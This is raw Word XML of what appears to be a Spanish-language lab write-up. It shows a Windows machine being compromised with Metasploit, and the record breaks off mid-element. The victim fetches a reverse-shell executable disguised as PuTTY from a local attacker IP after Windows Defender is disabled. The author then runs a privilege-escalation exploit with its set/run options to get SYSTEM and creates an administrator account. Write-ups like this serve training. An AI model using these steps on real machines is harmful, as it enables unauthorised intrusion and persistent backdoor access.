    <w:p w14:paraId="2096F0EE" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="59A59F05" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="41D26460" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="09D88FC5" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="541032DC" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora el la máquina que queremos comprometer entraremos en el navegador en esta dirección ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="003A7DB3">
        <w:t>http://192.168.1.</w:t>
      </w:r>
      <w:r>
        <w:t>44</w:t>
      </w:r>
      <w:r w:rsidRPr="003A7DB3">
        <w:t>/ msfv_reverse_putty_x64.exe</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7C07E7" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D47E490" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Antes de eso desactivaremos el Windows Defender.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A183245" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D4D3F42" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="078097AE" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y navegaremos a la url:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B479360" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="33EDA750" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03A6ECFB" wp14:editId="35DDF97B">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="828470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70110" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId222"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1222D9CD" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="5E0A4A17" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y ahora le daremos a ejecutar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC92C2C" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB06953" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FB8A22D" wp14:editId="09325E8F">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="568814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4590" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId223"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2DC59116" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F5BBD41" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="003927F1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Obteniendo una sesión de meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D782C4C" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="1648369B" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C624EFE" wp14:editId="127D4536">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1660663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3079" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId224"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6B63875C" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="644CD752" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora comprobaremos con que usuario estoy y que permisos tengo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ED4B37" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="146B6270" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AD4E17C" wp14:editId="03DB4D15">
            <wp:extent cx="5400040" cy="3470275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1994350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50465" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId225" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3470275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AC1410" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="428A9E8D" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora hacemos una Shell para comprobar al grupo que pertenece, para eso usaré el comando “net user usuario”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF1610F" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="7925747B" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F28DC00" wp14:editId="2D8C9669">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2122985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5261" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId226"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CF29270" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="70E8A0FC" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Podemos comprobar como pertenece al grupo de los Usuarios, así que no tiene privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDED302" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B51EB16" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Mandaremos la sesión a segundo plano, para poder hacer la escalada de privilegios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B49265" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="6A60F9A4" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05730CA5" wp14:editId="29B8C8E5">
            <wp:extent cx="5400040" cy="3009900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="503684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4221" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId227" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3009900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="641AA843" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB5ED00" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Buscaré por el cve:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775210F5" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22617FDE" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30FFC073" wp14:editId="5E86CBA6">
            <wp:extent cx="5400040" cy="2809875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1409992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92816" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId228" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2809875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11731AAE" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07D32D14" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora usaremos el exploit y lo configuraremos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B74FDA8" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6233E202" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B72479B" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="743F9145" wp14:editId="45B4E878">
            <wp:extent cx="5400040" cy="2262505"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="35480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0697" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId229" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2262505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A320030" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424470C3" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A6C873" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251740160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48472CB8" wp14:editId="6D8B629C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="9316615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766C384F" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                            <w:r>
                              <w:t>set sesión 1 -&gt; La sesión antes creada con meterpreter</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="30B91C9F" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                            <w:r>
                              <w:t>set lhost 192.168.1.44 -&gt; la IP que escucha</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="488BC538" w14:textId="59AD7F8C" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                            <w:r>
                              <w:t>set rhost 6666 -&gt; el puerto que escuc</w:t>
                            </w:r>
                            <w:r w:rsidR="00316CB3">
                              <w:t>h</w:t>
                            </w:r>
                            <w:r>
                              <w:t>a en la IP</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3519DDCB" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                            <w:r>
                              <w:t>run -&gt; para ejecutar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472CB8" id="_x0000_s1057" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517401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&#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GMdLvu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766C384F" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                      <w:r>
                        <w:t>set sesión 1 -&gt; La sesión antes creada con meterpreter</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="30B91C9F" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                      <w:r>
                        <w:t>set lhost 192.168.1.44 -&gt; la IP que escucha</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="488BC538" w14:textId="59AD7F8C" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                      <w:r>
                        <w:t>set rhost 6666 -&gt; el puerto que escuc</w:t>
                      </w:r>
                      <w:r w:rsidR="00316CB3">
                        <w:t>h</w:t>
                      </w:r>
                      <w:r>
                        <w:t>a en la IP</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3519DDCB" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
                      <w:r>
                        <w:t>run -&gt; para ejecutarlo</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5764B4EC" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D7DB712" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AE5189C" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71EE082A" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53BC17E3" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71ED3734" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346BBAA1" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8B442F" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58C3BED3" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="687C9950" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Obteniendo una Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F128B26" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5570F8A9" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1752FDB9" wp14:editId="65DC7035">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2053808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8774" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId230"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6A004CA6" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288973AB" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54C97E77" wp14:editId="51057392">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1873114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4843" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId231"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C272829" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="453C79D9" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora ejecutare un getuid para ver el usuario con que estoy conectado a meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1B4237" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC7FD49" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="592F87CC" wp14:editId="0F797C32">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="471238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8439" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId232"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4CDA66" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62633EB7" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y el usuario es system, con lo cual conseguirnos hacer correctamente la escalada de privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1469CD26" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39EFD60A" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora crearé abriré una Shell y crearé un usuario con permisos de Administrador:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F3100E" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47BBBB6F" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="429E50E6" wp14:editId="4E924D03">
            <wp:extent cx="5400040" cy="1359535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="869705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5635" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId233" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1359535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08125CB5" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="437B34E4" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora lo añadiré al grupo de administradores:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A8DDF3" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3157AC4A" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
